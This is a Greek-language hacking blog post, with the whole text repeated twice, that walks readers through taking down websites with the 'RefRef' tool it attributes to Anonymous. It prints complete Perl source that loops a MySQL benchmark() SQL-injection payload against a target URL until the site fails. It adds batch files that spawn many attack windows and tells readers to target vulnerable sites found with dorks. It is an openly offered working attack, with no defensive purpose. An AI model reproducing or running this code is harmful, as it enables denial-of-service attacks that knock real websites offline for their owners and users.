Ετικέτες Hacking
Στη σημερινή μας ανάρτηση θα δούμε πως να φτιάξετε και να επιτεθείτε σε ιστοσελίδες μέσω DDoS επίθεσης. Το πρόγραμμα αυτό είναι ένα απλό προγραμματάκι που κυκλοφόρησε από την ομάδα anonymous και κάνει επιθέσεις σε ιστοσελίδες που είναι τρωτές σε SQL Injection(οποιουδήποτε είδους).
*DDoS είναι πια επίθεση που υπερφορτώνει τον server με πολλά αιτήματα(επισκέψεις) σε σημείο να μην μπορεί να εξυπηρετήσει αυτούς που θέλουν να μπουν στην σελίδα με αποτέλεσμα να πέσει.
Ξεκινάμε! Πάμε στην επ. εργασίας μας και φτιάχνουμε έναν φάκελο με το όνομα refref. Μέσα φτιάχνουμε ένα έγγραφο κειμένου(.txt) και το ανοίγουμε με το σημειωματάριο. Μέσα στο σημειωματάριο αντιγράφουμε τον παρακάτω κώδικα(σε perl):
use LWP::UserAgent;
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}
sub adios {
print "\n[+] Stoping attack\n";
copyright();
}
sub head {
print "\n\n-- == #RefRef == --\n\n";
}
sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}
sub sintax {
print "\n[+] Sintax : $0 \n";
}
sub toma {
return $nave->get($_[0]);
}
# ¿ The End ?
Μόλις το κάνετε αυτό θα πατήσετε αποθήκευση ως... και θα το σώσετε μέσα στον φάκελο που φτιάξατε με το όνομα refref.pl.(ΠΡΟΣΟΧΗ: Για να τρέξει καλά το πρόγραμμα θα χρειαστεί να κατεβάσετε αυτό το πρόγραμμα http://www.activestate.com/activeperl). Μόλις το κατεβάσετε το εικονίδιο αυτού που φτιάξαμε αντί για το άσπρο θα έχει αυτόματα ένα γαλάζιο του perl).
Συνεχίζουμε... Φτιάχνουμε άλλο ένα έγγραφο κειμένου και γράφουμε μέσα:
start /min test.bat
pause
boucle.bat
Και το αποθηκεύουμε μέσα στον φάκελο ως boocle.bat. Μέχρι τώρα έχουμε 2 αρχεία μέσα στον φάκελό μας. Πάμε να φτιάξουμε το τρίτο, και το τελευταίο! Ξανανοίγετε το σημειωματάριο και γράφετε μέσα:
Refref.pl http://www.xxx.xxx/xxx.php?xxx=xxx
test.bat
Και το αποθηκεύετε ως test.bat, και ΤΕΛΟΣ! Το πρόγραμμά μας είναι έτοιμο να τρέξει.
Πώς κάνουμε την επίθεση;
Πολύ απλά πηγαίνετε στον φάκελο test.bat και εκεί που εγώ γράφω "http://www.xxx.xxx/xxx.php?xxx=xxx" εσείς θα βάλετε την τρωτή ιστοσελίδα μαζί με το τρύπιο dork. Τέλος το αποθηκεύετε και τρέχετε το αρχείο boucle.bat. Θα σας βγει μια μαύρη οθόνη σαν την παρακάτω που θα σας λέει να πατήσετε ένα κουμπί. Π.χ αν κάθε φορά που θα πατάτε enter θα ανοίγει ένα παράθυρο cmd και θα τρέχει την επίθεση! Όσες περισσότερες φορές πατήσετε enter τόσο πιο ισχυρή θα γίνει η επίθεση! Βεβαιωθείτε μόνο για το πόσο δυνατές επιθέσεις αντέχει να κάνει ο υπολογιστής σας και ανοίξτε τον αντίστοιχο αριθμό παραθύρων.
Πώς θα σταματήσετε την επίθεση;
Πολύ απλά θα πατήσετε σε όλα τα παράθυρα που εκτελούν την επίθεση CTRL+C και στη συνέχεια πατήστε yes για να σταματήσει η επίθεση.
Ακόμα η επίθεση θα γίνει στην ιστοσελίδα μέσω του τρύπιου dork σε όλη τη σελίδα και όχι μόνο στην τρύπια σελίδα που βάλαμε.
Στη σημερινή μας ανάρτηση θα δούμε πως να φτιάξετε και να επιτεθείτε σε ιστοσελίδες μέσω DDoS επίθεσης. Το πρόγραμμα αυτό είναι ένα απλό προγραμματάκι που κυκλοφόρησε από την ομάδα anonymous και κάνει επιθέσεις σε ιστοσελίδες που είναι τρωτές σε SQL Injection(οποιουδήποτε είδους).
*DDoS είναι πια επίθεση που υπερφορτώνει τον server με πολλά αιτήματα(επισκέψεις) σε σημείο να μην μπορεί να εξυπηρετήσει αυτούς που θέλουν να μπουν στην σελίδα με αποτέλεσμα να πέσει.
Ξεκινάμε! Πάμε στην επ. εργασίας μας και φτιάχνουμε έναν φάκελο με το όνομα refref. Μέσα φτιάχνουμε ένα έγγραφο κειμένου(.txt) και το ανοίγουμε με το σημειωματάριο. Μέσα στο σημειωματάριο αντιγράφουμε τον παρακάτω κώδικα(σε perl):
use LWP::UserAgent;
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}
sub adios {
print "\n[+] Stoping attack\n";
copyright();
}
sub head {
print "\n\n-- == #RefRef == --\n\n";
}
sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}
sub sintax {
print "\n[+] Sintax : $0 \n";
}
sub toma {
return $nave->get($_[0]);
}
# ¿ The End ?
Μόλις το κάνετε αυτό θα πατήσετε αποθήκευση ως... και θα το σώσετε μέσα στον φάκελο που φτιάξατε με το όνομα refref.pl.(ΠΡΟΣΟΧΗ: Για να τρέξει καλά το πρόγραμμα θα χρειαστεί να κατεβάσετε αυτό το πρόγραμμα http://www.activestate.com/activeperl). Μόλις το κατεβάσετε το εικονίδιο αυτού που φτιάξαμε αντί για το άσπρο θα έχει αυτόματα ένα γαλάζιο του perl).
Συνεχίζουμε... Φτιάχνουμε άλλο ένα έγγραφο κειμένου και γράφουμε μέσα:
start /min test.bat
pause
boucle.bat
Και το αποθηκεύουμε μέσα στον φάκελο ως boocle.bat. Μέχρι τώρα έχουμε 2 αρχεία μέσα στον φάκελό μας. Πάμε να φτιάξουμε το τρίτο, και το τελευταίο! Ξανανοίγετε το σημειωματάριο και γράφετε μέσα:
Refref.pl http://www.xxx.xxx/xxx.php?xxx=xxx
test.bat
Και το αποθηκεύετε ως test.bat, και ΤΕΛΟΣ! Το πρόγραμμά μας είναι έτοιμο να τρέξει.
Πώς κάνουμε την επίθεση;
Πολύ απλά πηγαίνετε στον φάκελο test.bat και εκεί που εγώ γράφω "http://www.xxx.xxx/xxx.php?xxx=xxx" εσείς θα βάλετε την τρωτή ιστοσελίδα μαζί με το τρύπιο dork. Τέλος το αποθηκεύετε και τρέχετε το αρχείο boucle.bat. Θα σας βγει μια μαύρη οθόνη σαν την παρακάτω που θα σας λέει να πατήσετε ένα κουμπί. Π.χ αν κάθε φορά που θα πατάτε enter θα ανοίγει ένα παράθυρο cmd και θα τρέχει την επίθεση! Όσες περισσότερες φορές πατήσετε enter τόσο πιο ισχυρή θα γίνει η επίθεση! Βεβαιωθείτε μόνο για το πόσο δυνατές επιθέσεις αντέχει να κάνει ο υπολογιστής σας και ανοίξτε τον αντίστοιχο αριθμό παραθύρων.
Πώς θα σταματήσετε την επίθεση;
Πολύ απλά θα πατήσετε σε όλα τα παράθυρα που εκτελούν την επίθεση CTRL+C και στη συνέχεια πατήστε yes για να σταματήσει η επίθεση.
Ακόμα η επίθεση θα γίνει στην ιστοσελίδα μέσω του τρύπιου dork σε όλη τη σελίδα και όχι μόνο στην τρύπια σελίδα που βάλαμε.
0 σχόλια:
Δημοσίευση σχολίου